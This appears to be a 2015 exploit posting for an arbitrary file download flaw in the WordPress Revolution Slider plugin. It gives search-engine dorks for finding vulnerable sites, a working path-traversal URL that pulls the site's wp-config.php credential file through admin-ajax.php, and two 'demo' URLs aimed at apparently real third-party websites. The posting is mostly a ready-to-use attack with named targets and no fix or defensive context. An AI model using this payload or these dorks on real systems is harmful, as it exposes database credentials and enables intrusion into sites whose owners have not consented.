facebook facebook twitter rss

Wordpress plugin reolusion slider Arbitrary File Download Vulnerability

Author: Iran Cyber Security Group , Published: 29-01-2015
##############################################################

# Exploit Title: Wordpress plugin reolusion slider Arbitrary File Download Vulnerability

#

# Exploit Author: Iran Cyber Security Group

#

# Discovered By: JOK3R

#

# Dork 1: inurl:/wp-content/plugins/revolution-slider/

#

# Dork 2: index of /wp-content/plugins/revolution-slider/

#

# Date: 25-01-2015

#

# Tested on: Kali, Win8.1

#

# Category: webapps

#

# platform: php

##############################################################

VULNERABILITY

##############

[~] VULNERABILITY}~~



[~] http://www.Site.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php





##############



demo 1: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php



demo 2: http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php



##############################################################

Contact Fb : fb.com/x.jok3r.x

Contact mail: n4tw0rk@yahoo.com


Special Thanks : Mohamad Nofozi - Sheytan Azzam - Root3r - Alireza promis - Mr moein - Kamran Hallish And All iranian Hacker's and Exploiter's

##############################################################

Like us on Facebook :